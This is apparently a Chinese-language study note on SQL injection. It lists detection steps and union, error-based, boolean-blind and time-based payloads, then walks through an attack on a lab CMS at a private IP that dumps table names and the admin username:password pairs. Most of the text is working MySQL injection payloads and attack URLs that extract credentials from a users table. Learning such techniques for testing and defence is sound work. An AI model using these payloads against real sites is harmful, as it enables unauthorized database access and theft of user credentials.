777' or 1=1 #
admin' or '1'='1
在与数据库交互的地方利用精心设计好的sql语句打破原有的语句结构,达到结果意料之外结果的攻击行为
GET 注入
POST 注入
Cookie 注入
HTTP 头部注入
会在疑似注入点的地方或者参数后面尝试提交数据,从而进行判断是否存在SQL 注入漏洞。
步骤 | 测试数据 | 测试判断 | |
---|---|---|---|
1 | -1 或 +1 | 是否能够回显上一个或者下一个页面(判断是否有回显) | |
2 | ’ 或 " | 是否显示数据库错误信息;根据回显内容可以判断是字符型数据还是数字型。 | |
3 | and 1=1and 1=2 | 回显的页面是否不同(布尔类型的状态) | |
4 | and sleep(5) | 判断页面的返回时间 | |
5 | \ | 判断转义 |
攻击者可以利用 SQL 注入漏洞,可以获取数据库中的多种信息,例如,后台管理员账密,从而脱取数据库中的内容(脱库)。
在特别的情况下还可以插入内容到数据库、删除数据库中的内容或者修改数据库内容。
如果数据库权限分配存在问题,或者数据库本身存在缺陷,攻击者可以利用 SQL 注入漏洞直接获取 WebShell 或者服务器权限。
如果near报错语句中没有出现查询的id大概率为数字型注入
数据库的内容会回显到网页中考虑联合查询
有报错信息考虑报错注入
有bool类型状态考虑布尔盲注
延迟语句能够执行考虑延时注入
注释 URL中显示
-- 减减空格 --+
# %23
/* */
代替空格字符可以用:
适用数据库中的内容会回显到页面中来的情况。联合查询就是利用 union select 语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询
对目标进行分析查找注入点
根据报错信息来查看是字符型还是数字型,字符型需要补引号(’ ")数字不用
使用union关键字进行联合查询 select * from tbName where id=32 union select …
通过order by进行列数猜测,因为要具有相同的列数如果超出列数就会报错从而快速锁定列数
锁定列数把所有列数列出来使用数字进行占位 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15
再次查询时就可以找到回显位
在回显位输入sql函数比如版本,当前库名
利用 information_schema库中查询当前库中的所有表的个数?id=-33 UNION SELECT 1,2,count(*),4,5,6,7,8,9,10,11,12,13,14,15 from
information_schema.tables where table_schema=database()
查询所有表名?id=-33 UNION SELECT
1,2,hex(group_concat(table_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.tables where table_schema=database()
查询想要查看表的字段?id=-33 UNION SELECT
1,2,hex(group_concat(column_name)),4,5,6,7,8,9,10,11,12,13,14,15 from information_schema.columns where table_schema=database() and table_name=‘cms_users’
查询该字段下的内容?id=-33 UNION SELECT
1,2,hex(concat(username,0x3a,password)),4,5,6,7,8,9,10,11,12,13,14,15 from cms_users
在注入点的判断过程中,发现数据库中 SQL 语句的报错信息,会显示在页面中,因此可以利用报错信息进行注入。报错注入的原理,就是在错误信息中执行 SQL 语句。触发报错的方式有很多,具体细节也不尽相同。
是mysql的一个bug
需要靠运气多执行几次
?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
?id=33 and (select 1 from (select count(*),concat(0x5e,(select password from cms_users limit 0,1),0x5e,floor(rand()*2))x from information_schema.tables group by x)a)
将查询和报错语句混合执行查询语句
?id=33 and extractvalue(1,concat(0x5e,(select database()),0x5e))
?id=33 and extractvalue(1,concat(0x5e,substr((select password from cms_users),17,32),0x5e))
?id=33 and updatexml(1,concat(0x5e,(select database()),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,1,16) from
cms_users),0x5e),1)
?id=33 and updatexml(1,concat(0x5e,(select substr(password,17,32) from cms_users),0x5e),1)
查询库名长度
?id=2’ and length(database())=8 --+
知道长度开始按位测试
?id=2’ and ascii(substr(database(),1,1))=115 --+
查询库名长度
?id=2’ and if(length(database())>1,sleep(5),1) --+
库名开始按位测试
?id=2’ and if(substr(database(),3,1)=‘c’,sleep(5),1) --+
寻找注入点 加‘闭合数据库报错可以看到是数字型
利用order by 进行猜测行数猜测15
发现显示正常猜测16发现报错
我们知道他有16行就使用联合查询进行位置判断用将数字当成占位符寻找回显位http://10.9.47.77/cms/show.php?id=35%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15
切记要使前面的语句为假
找到回显位是3和11查询一下当前库名 把3的位置换为database()函数
利用information_schema库来查询库名为cms中的表所有表
因为查询为多个结果用group_concat()将要查询的字段括起来就会显示在一起还有就是要用转换成16进制要不然union查询会报错
http://10.9.47.77/cms/show.php?id=35%20and%201=2%20%20union%20select%201,2,hex(group_concat(table_name)),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.tables%20where%20table_schema=database()
我们可以看到是16进制的我们转换一下
得到了表名cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page,cms_users
继续查询一下cms_users表名里的字段
http://10.9.47.77/cms/show.php?id=35%20and%201=2%20%20union%20select%201,2,hex(group_concat(column_name)),4,5,6,7,8,9,10,11,12,13,14,15%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27cms_users%27
转换一下
得到两个字段username,password 进行查询
http://10.9.47.77/cms/show.php?id=35%20and%201=2%20%20union%20select%201,2,%20concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15%20%20from%20cms_users
账密就查询到了
?id=33 and (select 1 from (select count(*),concat(0x5e,(select database()),0x5e,floor(rand()*2))x from information_schema.tables group by x)a) 查询当前库
查找账密
由于布尔盲注和延迟注入成本太高后续上传python脚本编写